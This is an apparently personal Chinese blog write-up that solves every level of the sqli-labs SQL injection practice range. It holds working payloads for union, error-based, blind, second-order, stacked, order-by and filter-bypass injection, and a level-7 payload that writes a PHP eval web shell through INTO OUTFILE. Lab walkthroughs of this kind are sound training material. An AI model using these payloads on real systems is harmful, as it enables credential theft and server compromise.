以前說好複習一遍 結果複習到10關就沒繼續了 真是廢物 一點簡單的事做不好
繼續把以前有頭沒尾的事做完
以下爲Sqli-lab的靶場全部通關答案
目錄:
1-2關 基於錯誤的字符串/數字型注入
閉合的符號有區別而已
http://www.sqli-lab.cn/Less-1/?id=1 or 1=1 --
http://www.sqli-lab.cn/Less-1/?id=1' order by 3 --+ #字段數爲3
http://www.sqli-lab.cn/Less-1/?id=1' and 1=2 union select 1,2,3 --+ #顯示位爲2,3
http://www.sqli-lab.cn/Less-1/?id=1' and 1=2 union select 1,version(),database() --+
查看所有數據庫名
http://www.sqli-lab.cn/Less-1/?id=1' AND 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
查詢security內的所有表名
http://www.sqli-lab.cn/Less-1/?id=1' AND 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+
接着使用下面的語句爆破出列名
http://www.sqli-lab.cn/Less-1/?id=1' AND 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users') --+
爆用戶名和密碼
http://www.sqli-lab.cn/Less-1/?id=1' AND 1=2 union select 1,(select group_concat(password) from security.users) ,(select group_concat(username) from security.users) --+
3-4關也是一樣 只不過閉合符號不一樣了些 需要 ') 來閉合
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}else{
print_r(mysql_error());
}
5-6關 這裏打印了錯誤信息 ,可以布爾盲注也可以直接報錯注入
(1). 通過floor報錯
and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a)
其中payload爲你要插入的SQL語句
需要注意的是該語句將 輸出字符長度限制爲64個字符
(2). 通過updatexml報錯
and updatexml(1,payload,1)
同樣該語句對輸出的字符長度也做了限制,其最長輸出32位
並且該語句對payload的反悔類型也做了限制,只有在payload返回的不是xml格式纔會生效
(3). 通過ExtractValue報錯
and extractvalue(1, payload)
輸出字符有長度限制,最長32位。
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'You are in...........';
}else{
print_r(mysql_error());
}
http://www.sqli-lab.cn/Less-5/?id=1' union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+
http://www.sqli-lab.cn/Less-5/?id=1' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
表名
http://www.sqli-lab.cn/Less-5/?id=1' union select null,count(*),concat((select column_name from information_schema.columns where table_name='users' limit 0,1),floor(rand()*2))as a from information_schema.tables group by a%23
爆列
http://www.sqli-lab.cn/Less-5/?id=1' union select null,count(*),concat((select column_name from information_schema.columns where table_name='users' limit 7,1),floor(rand()*2))as a from information_schema.tables group by a%23
爆值
http://www.sqli-lab.cn/Less-5/?id=1' union select null,count(*),concat((select username from users limit 0,1),floor(rand()*2))as a from information_schema.tables group by a%23
第7關 into Outfile來寫shell
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'You are in.... Use outfile......';
}else{
echo 'You have an error in your SQL syntax';
}
$id被雙層括號和單引號包圍,URL正確時有提示 用outfile,錯誤時只知有錯誤
http://www.sqli-lab.cn/Less-7/?id=1')) union select null,0x3c3f706870206576616c28245f504f53545b2774657374275d293f3e,null into outfile 'E:\\phpstudy\\WWW\\sqli\\Less-7\\1.php' --+
第八關 基於布爾的盲注
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'You are in...........';
}else{
}
http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select database()) ,1,1))) = 115--+
http://www.sqli-lab.cn/Less-8/?id=1' and (length(database())) = 8 --+ #數庫名長度=8
盲注得出數據庫名 security
http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select database()) ,1,1))) = 115 --+
http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select database()) ,2,1))) = 101 --+
http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select database()) ,3,1))) = 99 --+
http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select database()) ,4,1))) = 117 --+
http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select database()) ,5,1))) = 114 --+
http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select database()) ,6,1))) = 105 --+
http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select database()) ,7,1))) = 116 --+
http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select database()) ,8,1))) = 121 --+
接着判斷表名長度
http://www.sqli-lab.cn/Less-8/?id=1' and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 --+
判斷出第四張表示user
http://www.sqli-lab.cn/Less-8/?id=1' and (length((select table_name from information_schema.tables where table_schema=database() limit 3,1))) = 5 --+
http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 117 --+
http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,2,1))) = 115 --+
http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,3,1))) = 101 --+
http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,4,1))) = 114 --+
http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,5,1))) = 115 --+
其他的同樣的方法 替換payload而已
第九和十關 基於時間的盲注
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'You are in...........';
}else{
echo 'You are in...........';
}
http://www.sqli-lab.cn/Less-9/?id=1'+and+if(1=1, sleep(5), null)+ --+
通過延遲來判斷
http://www.sqli-lab.cn/Less-9/?id=1' and (length(database())) = 8 +and+if(1=1, sleep(5), null)+ --+ http://www.sqli-lab.cn/Less-9/?id=1' and (ascii(substr((select database()) ,1,1))) = 115 +and+if(1=1, sleep(1), null)+ --+
逐個猜解便是
Less11
payload:
uname=admin' order by 2#&passwd=1&submit=Submit //判斷列數
uname=admin' or '1'='1' #&passwd=1&submit=Submit
uname=-qing' union select 1,(SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata)##&passwd=1&submit=Submit//爆全部數據
沒啥說的
Less12
和11關一小點不同
閉合符號不一樣而已
payload:
uname=admin") order by 2#&passwd=1&submit=Submit //判斷列數
uname=admin") or '1'='1' #&passwd=1&submit=Submit
uname=-qing") union select 1,(SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata)##&passwd=1&submit=Submit//爆全部數據
Less13
// connectivity @$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);
用註釋符號就很簡單了 不用註釋也只是需要一點點變化
payload:
uname= qing') or 1=1 -- +&passwd=1&submit=Submit uname= qing') or ('1')=('1 &passwd= ') or ('1')=('1 &submit=Submit uname= qing') or 1=1 # &passwd= ') or 1=1 # &submit=Submit
爆數據:
莫得回顯數據 就直接報錯函數了
uname= qing') union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) as qing from information_schema.tables group by qing # &passwd= ') or 1=1 # &submit=Submit uname= qing') union select count(*),concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2)) as qing from information_schema.tables group by qing # &passwd= ') or 1=1 # &submit=Submit uname= qing') union select 1,2 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= qing') or 1=1 # &submit=Submit uname= qing') union select 1,2 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= qing') or 1=1 # &submit=Submit uname= qing') union select 1,2 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= qing') or 1=1 # &submit=Submit uname= qing') union select 1,2 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= qing') or 1=1 # &submit=Submit uname= qing') union select 1,2 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= qing') or 1=1 # &submit=Submit
Less14
$uname='"'.$uname.'"'; $passwd='"'.$passwd.'"'; @$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
和上關的閉合符號不一樣而已 不再多說
payload:
uname= qing" union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as qing from information_schema.tables group by qing # &passwd= ') or 1=1 # &submit=Submit
Less15
單引號閉合的布爾盲注 直接用盲注語句猜解就是了
uname=' or (length(database())) = 8 #&passwd=' or 1=1 #&submit=Submit uname=' or (ascii(substr((select database()) ,1,1))) = 115 #&passwd=' or 1=1 #&submit=Submit
Less16
閉合變成雙引號的 不多說
Less17
update的注入
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); //echo $row; if($row) { //echo '<font color= "#0000ff">'; $row1 = $row['username']; //echo 'Your Login name:'. $row1; $update="UPDATE users SET password = '$passwd' WHERE username='$row1'"; mysql_query($update); echo "<br>";
payload:
uname=admin&passwd=qing' or updatexml(1,concat(0x7e,(version()),0x7e),0) or '&submit=Submit
Less18
http頭的內容拿到insert 基於報錯注入就ok
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1"; $result1 = mysql_query($sql); $row1 = mysql_fetch_array($result1); if($row1) { echo '<font color= "#FFFF00" font size = 3 >'; $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)"; mysql_query($insert);
payload:
qing' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '
Less - 19
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1"; $result1 = mysql_query($sql); $row1 = mysql_fetch_array($result1); if($row1) { echo '<font color= "#FFFF00" font size = 3 >'; $insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
這次就是基於refer字段拼接到insert 和上一個一樣的道理。
Less - 20
$cookee = $_COOKIE['uname']; $format = 'D d M Y - H:i:s'; $timestamp = time() + 3600; echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT']; echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR']; echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp); $sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
cookie字段的注入 位置不同而已
payload:
Cookie: uname=' union select 1,database(),6 or 1=1 #;
Less - 21
cookie注入
YOUR COOKIE : uname = RHVtYg== and expires: Sat 16 Jul 2016 - 08:32:26
注: RHVtYg== 是 Dumb 經Base64加密後的值
和上關又是差不多 base64編碼而已
payload:
') or 1=1 #
Jykgb3IgMT0xICM=
Less - 22
閉合爲雙引號 參考上關不多說
Less - 23
過濾了註釋符號 而已
$reg = "/#/"; $reg1 = "/--/"; $replace = ""; $id = preg_replace($reg, $replace, $id); $id = preg_replace($reg1, $replace, $id); $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
payload:
qing' union select 1,group_concat(username),group_concat(password) from users where 1 or '1' = '
Less - 24
最簡單的二次注入 沒任何過濾
login.php:
發現輸入進行了mysql_real_escape_string()函數轉義 編碼如果不是gbk寬字節注入 單引號是不能用了。
function sqllogin(){ $username = mysql_real_escape_string($_POST["login_user"]); $password = mysql_real_escape_string($_POST["login_password"]); $sql = "SELECT * FROM users WHERE username='$username' and password='$password'"; //$sql = "SELECT COUNT(*) FROM users WHERE username='$username' and password='$password'"; $res = mysql_query($sql) or die('You tried to be real smart, Try harder!!!! :( '); $row = mysql_fetch_row($res); //print_r($row) ; if ($row[1]) { return $row[1]; } else { return 0; } }
login_create.php:
//$username= $_POST['username'] ; $username= mysql_escape_string($_POST['username']) ; $pass= mysql_escape_string($_POST['password']); $re_pass= mysql_escape_string($_POST['re_password']); echo "<font size='3' color='#FFFF00'>"; $sql = "select count(*) from users where username='$username'"; $res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( '); $row = mysql_fetch_row($res);
這裏看到這裏把username再次取出來查詢的沒有任何過濾 所以我們在插入username的就直接把注入的payload插到數據庫裏,取出來時候造成注入
admin' or 1=1#
登錄了admin' or 1=1#這個賬號 輸入新密碼qing
# Validating the user input........ $username= $_SESSION["username"]; $curr_pass= mysql_real_escape_string($_POST['current_password']); $pass= mysql_real_escape_string($_POST['password']); $re_pass= mysql_real_escape_string($_POST['re_password']); if($pass==$re_pass) { $sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' "; $res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( '); $row = mysql_affected_rows();
update的時候就把我們原先的admin' or 1=1 #取出來拿到語句中了 所以密碼都是qing了。
Less - 25
這關開始過濾
function blacklist($id){ $id= preg_replace('/or/i',"", $id); $id= preg_replace('/AND/i',"", $id); return $id; } $id= blacklist($id); $hint=$id; $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
雙寫就行了 沒啥說的
payload:
http://sqli-qing.cn/sqli/Less-25/?id=1' oorr '1'='1 http://sqli-qing.cn/sqli/Less-25/?id=qing' union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security' --+
Less - 25a
這關和25一樣 莫得單引號而已
http://sqli-qing.cn/sqli/Less-25a/?id=-1 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security' --+
Less - 26
這關過濾多一些 好耍一點
function blacklist($id) { $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive) $id= preg_replace('/[\/\*]/',"", $id); //strip out /* $id= preg_replace('/[--]/',"", $id); //Strip out -- $id= preg_replace('/[#]/',"", $id); //Strip out # $id= preg_replace('/[\s]/',"", $id); //Strip out spaces $id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes return $id; } $id= blacklist($id); $hint=$id; $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
單引號閉合 過濾了 or,and , /* , – , # , 空格 , /
payload:
qing'%A0union%A0select%A01,group_concat(username),group_concat(passwoorrd)%A0from%A0security%2Eusers%A0where%A01%A0%26%26%a0'1
%A0替代空格 &&替換and 注意url編碼 需要linux 不測試了
Less - 26a
多一個閉合括號 不多說
Less - 27
function blacklist($id){ $id= preg_replace('/[\/\*]/',"", $id); //strip out /* $id= preg_replace('/[--]/',"", $id); //Strip out --. $id= preg_replace('/[#]/',"", $id); //Strip out #. $id= preg_replace('/[ +]/',"", $id); //Strip out spaces. $id= preg_replace('/select/m',"", $id); //Strip out spaces. $id= preg_replace('/[ +]/',"", $id); //Strip out spaces. $id= preg_replace('/union/s',"", $id); //Strip out union $id= preg_replace('/select/s',"", $id); //Strip out select $id= preg_replace('/UNION/s',"", $id); //Strip out UNION $id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT $id= preg_replace('/Union/s',"", $id); //Strip out Union $id= preg_replace('/Select/s',"", $id); //Strip out select return $id; }
多一些過濾 關鍵字大小寫就行了
payload:
0'%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0'1
Less - 27a
function blacklist($id){ $id= preg_replace('/[\/\*]/',"", $id); //strip out /* $id= preg_replace('/[--]/',"", $id); //Strip out --. $id= preg_replace('/[#]/',"", $id); //Strip out #. $id= preg_replace('/[ +]/',"", $id); //Strip out spaces. $id= preg_replace('/select/m',"", $id); //Strip out spaces. $id= preg_replace('/[ +]/',"", $id); //Strip out spaces. $id= preg_replace('/union/s',"", $id); //Strip out union $id= preg_replace('/select/s',"", $id); //Strip out select $id= preg_replace('/UNION/s',"", $id); //Strip out UNION $id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT $id= preg_replace('/Union/s',"", $id); //Strip out Union $id= preg_replace('/Select/s',"", $id); //Strip out Select return $id; }
閉合不一樣而已
payload:
0"%A0or(1)=(1)%26%26%a0"1
http://sqli-qing.cn/sqli/Less-27/?id=0"%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema='security'%26%26%a0"1 http://sqli-qing.cn/sqli/Less-27/?id=0"%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0"1
Less - 28
function blacklist($id) { $id= preg_replace('/[\/\*]/',"", $id); //strip out /* $id= preg_replace('/[--]/',"", $id); //Strip out --. $id= preg_replace('/[#]/',"", $id); //Strip out #. $id= preg_replace('/[ +]/',"", $id); //Strip out spaces. //$id= preg_replace('/select/m',"", $id); //Strip out spaces. $id= preg_replace('/[ +]/',"", $id); //Strip out spaces. $id= preg_replace('/union\s+select/i',"", $id); //Strip out UNION & SELECT. return $id; }
過濾union select這一個組合,也要過濾空格,所以採用union union select select方法繞過,空格照樣用%0a替換
payload:
0')%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0('1
Less - 28a
簡單不多說
Less - 29
加了一個很弱的"waf.."
if(isset($_GET['id'])) { $qs = $_SERVER['QUERY_STRING']; $hint=$qs; $id1=java_implimentation($qs); $id=$_GET['id']; //echo $id1; whitelist($id1); //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
//WAF implimentation with a whitelist approach..... only allows input to be Numeric. function whitelist($input) { $match = preg_match("/^\d+$/", $input); if($match) { //echo "you are good"; //return $match; } else { header('Location: hacked.php'); //echo "you are bad"; } } // The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution). function java_implimentation($query_string) { $q_s = $query_string; $qs_array= explode("&",$q_s); foreach($qs_array as $key => $value) { $val=substr($value,0,2); if($val=="id") { $id_value=substr($value,3,30); return $id_value; echo "<br>"; break; } } } ?>
注入方法就是參數污染
例子 顯示的是id=2的內容 但是waf檢測的是前面id=1的內容 好理解吧?
payload:
http://sqli-qing.cn/sqli/Less-29/?id=' union select 1,version(),database() --+ http://sqli-qing.cn/sqli/Less-29/?id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+ http://sqli-qing.cn/sqli/Less-29/?id=' union select 1,group_concat(username),group_concat(password) from security.users where 1 --+
Less - 30
不多說 花裏胡哨非得設置單獨一關
Less - 31
同上
Less - 32
function check_addslashes($string) { $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string); //escape any backslash $string = preg_replace('/\'/i', '\\\'', $string); //escape single quote with a backslash $string = preg_replace('/\"/', "\\\"", $string); //escape double quote with a backslash return $string; } ... mysql_query("SET NAMES gbk"); $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; ... function strToHex($string) { $hex=''; for ($i=0; $i < strlen($string); $i++) { $hex .= dechex(ord($string[$i])); } return $hex; } echo "Hint: The Query String you input is escaped as : ".$id ."<br>"; echo "The Query String you input in Hex becomes : ".strToHex($id). "<br>";
簡單說check_addslashes函數把\\ 單引號 雙引號都進行過濾轉義
明顯的編碼gbk 寬字節注入 不用多說
payload:
http://sqli-qing.cn/sqli/Less-32/?id=-1%df%27 UNion seleCt 1,2,DATABASE()--+
Less-33
不多說
Less-34
變成32 33 post的方式而已 沒意義
Less-35
// take the variables if(isset($_GET['id'])) { $id=check_addslashes($_GET['id']); //echo "The filtered request is :" .$id . "<br>"; ... // connectivity mysql_query("SET NAMES gbk"); $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
id沒有被單引號括起來所以addslashes起不到作用
正常各種payload即可:
http://sqli-qing.cn/sqli/Less-35/?id=-1x and extractvalue(1,concat(0x7e,(select database()),0x7e))--+
Less-36
function check_quotes($string) { $string= mysql_real_escape_string($string); return $string; } // take the variables if(isset($_GET['id'])) { $id=check_quotes($_GET['id']); //echo "The filtered request is :" .$id . "<br>";
mysql_real_escape_string轉義 還是一樣不多說
Less-37
post登錄的而已
uname=admin%df%27 or 1=2 union select 1,database()#
Less-38
堆疊注入 來看看
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; /* execute multi query */ if (mysqli_multi_query($con1, $sql)) { /* store first result set */ if ($result = mysqli_store_result($con1)) { if($row = mysqli_fetch_row($result)) { echo '<font size = "5" color= "#00FF00">'; printf("Your Username is : %s", $row[1]); echo "<br>"; printf("Your Password is : %s", $row[2]); echo "<br>"; echo "</font>"; } // mysqli_free_result($result); } /* print divider */ if (mysqli_more_results($con1)) { //printf("-----------------\n"); } //while (mysqli_next_result($con1)); } else { echo '<font size="5" color= "#FFFF00">'; print_r(mysqli_error($con1)); echo "</font>"; } /* close connection */ mysqli_close($con1);
mysqli_multi_query() 函數執行一個或多個針對數據庫的查詢。多個查詢用分號進行分隔。(有這個才能進行堆疊)
分號我們可以加入注入的新的語句
payload:
http://sqli-qing.cn/sqli/Less-38/?id=2%FE' or 1=1 %23 http://sqli-qing.cn/sqli/Less-38/?id=0%FE' union select 1,version(),database() %23 http://sqli-qing.cn/sqli/Less-38/?id=0%FE' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23 http://sqli-qing.cn/sqli/Less-38/?id=0%FE' union select 1,group_concat(username),group_concat(password) from security.users where 1 %23
Less-39
參考38
Less - 40
參考38
Less - 41
爲數字的堆疊 還是參考38
Less - 42
還是堆疊
qing';creat table me like users
Less - 43
閉合爲') 深感這些關出出來沒什麼意義
Less - 44
$username = mysqli_real_escape_string($con1,$_POST["login_user"]); $password = $_POST["login_password"]; $sql = "SELECT * FROM users WHERE username='$username' and password='$password'"; if (@mysqli_multi_query($con1, $sql)){ if($result = @mysqli_store_result($con1)){ if($row = @mysqli_fetch_row($result)){ if ($row[1]){ return $row[1]; }else{ return 0; }
payload:
login_user=admin&login_password=1' or '1'='1&mysubmit=login
Less - 45
$username = mysqli_real_escape_string($con1, $_POST["login_user"]); $password = $_POST["login_password"]; $sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')"; if (@mysqli_multi_query($con1, $sql)){ if($result = @mysqli_store_result($con1)){ if($row = @mysqli_fetch_row($result)){ if ($row[1]){ return $row[1]; }else{ return 0; } } } }
Less - 46
到了order by注入 來看看哈
$id=$_GET['sort']; if(isset($id)) { //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'SORT:'.$id."\n"); fclose($fp); $sql = "SELECT * FROM users ORDER BY $id"; $result = mysql_query($sql);
通過asc 和desc查看返回數據是否相同來簡單判斷是否存在order by注入
http://sqli-qing.cn/sqli/Less-46/?sort=1+asc http://sqli-qing.cn/sqli/Less-46/?sort=1+desc
說下order by可以哪些方法注入
首先報錯注入
http://sqli-qing.cn/sqli/Less-46/?sort=1 and(updatexml(1,concat(0x7e,(select database())),0));
還可以盲注 可以用到異或注入 這裏布爾盲注
id ^(select(select version()) regexp '^5')
http://sqli-qing.cn/sqli/Less-46/?sort=1 ^(select(select version()) regexp '^5')
稍微提一下:
regexp正則匹配的時候,如果匹配到數據返回1(00000001)的時候,此時的1會和id中的數據的二進制進行異或,按照異或的結果進行升序排列,所以顯示的排列會發生變化;反之當進行正則匹配的時候,未匹配到數據返回0(00000000),此時數字和0異或的結果還是本身,所以顯示的排列不會發生改變。
時間盲注也可以
http://sqli-qing.cn/sqli/Less-46/?sort=if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(5)))test))
order by 也可以union 聯合查詢
order by id ) union(select 1,(version()),3)
有個條件前面得有個( ctf有 實戰沒遇到過
Less - 47
閉合爲單引號 參考46
Less - 48
這關就是盲注了 參考46
Less - 49
$sql = "SELECT * FROM users ORDER BY '$id'"; $result = mysql_query($sql); if ($result){ while ($row = mysql_fetch_assoc($result)){ echo $row['username']; echo $row['password']; } }
Less - 50
數字型 參考46
Less - 51
Less - 52
Less - 53
這些關都可以參考46 差別真的太小了 沒有意義的關卡
Less 54
這一關沒什麼特別 特別在於查詢的次數 key下面那段就是爲了控制查詢次數 隨便表名列名
// Querry DB to get the correct output $sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1"; ... $key = addslashes($_POST['key']); $key = mysql_real_escape_string($key); //echo $key; //Query table to verify your result $sql="SELECT 1 FROM $table WHERE $col1= '$key'"; //echo "$sql"; $result=mysql_query($sql)or die("error in submittion of Key Solution".mysql_error()); $row = mysql_fetch_array($result);
payload:
http://sqli-qing.cn/sqli/Less-54/?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+ http://sqli-qing.cn/sqli/Less-54/?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='qing' --+ http://sqli-qing.cn/sqli/Less-54/?id=0' union select 1,group_concat(secret_qing),group_concat(sessid) from challenges.qing --+
首先知道庫名 challenges
查詢表名
http://sqli-qing.cn/sqli/Less-54/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+
列名和剩下的不多說了把
id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='842yxlmx7h'--+
http://sqli-qing.cn/sqli/Less-54/?id=-1'union select 1,2,group_concat(secret_KOB8) from challenges.842yxlmx7h--+
Less - 55
同 Less 54。 基於小括號
Less - 56
同 Less 54。基於小括號_單引號
Less - 57
同 Less 54。基於 _雙引號_字符型 沒意義
Less - 58
一點區別而已 這關開始不返回數據庫查詢內容 不能union select 那就報錯
and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘7mu71b84nt’),0x7e))–
Less - 59
Less - 60
不多說 看58
Less - 61
-1’)) and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘challenges’),0x7e))–+
Less - 62
這裏union注入和報錯注入都不行
盲注 不多說
)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(10))–+
Less - 63
Less - 64
LESS-65
閉合不同 做法同62
恩完畢 國慶寫的還有點感冒 溜了溜了